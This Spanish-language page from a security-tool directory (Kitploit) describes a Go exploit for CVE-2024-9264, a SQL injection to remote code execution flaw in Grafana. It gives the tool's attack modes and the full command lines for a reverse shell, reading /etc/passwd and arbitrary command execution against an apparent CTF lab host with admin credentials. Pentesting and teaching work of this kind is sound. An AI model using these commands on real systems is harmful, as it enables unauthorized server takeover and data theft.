Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-9264 — Una implementación en Go para CVE-2024-9264 que afecta a las versiones de Grafana 11.0.x, 11.1.x y 11.2.x. | Kitploit
Herramientas/GitHubGitHub/cythonic1/cve-2024-9264
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubcythonic1/cve-2024-9264

CVE-2024-9264

Una implementación en Go para CVE-2024-9264 que afecta a las versiones de Grafana 11.0.x, 11.1.x y 11.2.x.

Ver Repositorio
31hace 1 añoAún no revisado
Sitio web

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

🚨 CVE-2024-9264 - Inyección SQL en Grafana que lleva a Ejecución Remota de Código (RCE) y lectura de archivos

Herramienta de exploit para CVE-2024-9264, una vulnerabilidad crítica en Grafana que permite a un atacante autenticado ejecutar una consulta SQL que lleva a RCE

🛡️ Esta herramienta es estrictamente para fines educativos y pruebas de penetración autorizadas.
El uso no autorizado es ilegal y poco ético.


🧠 Resumen de la vulnerabilidad

🕳️ ¿Qué es CVE-2024-9264?

CVE-2024-9264 es una falla crítica en Grafana que permite a un atacante autenticado ejecutar comandos SQL que llevan a RCE y lectura de archivos

🧬 Causa raíz

  • Sanitización insuficiente.

💥 Impacto

  • RCE: Ejecutar comandos arbitrarios, obtener shells reversas o leer archivos confidenciales.
  • Alta gravedad: Toma completa del servidor posible si tiene éxito.

  • ⚒️ Características

    • Soporta múltiples modos de ataque:
      • file – Leer archivos arbitrarios (ej. /etc/passwd)
      • shell – Shell reversa a la máquina del atacante
      • command – Ejecutar comandos arbitrarios (ej. whoami)
    • IP, puerto y credenciales del atacante personalizables

    🚀 Uso

    menú de ayuda

    No todos los argumentos son necesarios.

    ejemplos

    Obtener shell

    go run main.go -ip 10.10.16.91 -port 8080 -username admin -password 0D5oT70Fq13EvB5r -url http://grafana.planning.htb -type shell

    Leer archivos

    go run main.go -username admin -password 0D5oT70Fq13EvB5r -url http://grafana.planning.htb -type file -filename /etc/passwd

    Ejecutar comando único

    go run main.go -username admin -password 0D5oT70Fq13EvB5r -url http://grafana.planning.htb -type command -cmd 'ls -al'

    🔧 Banderas de línea de comandos

    go run main.go [flags]

    Descargar herramienta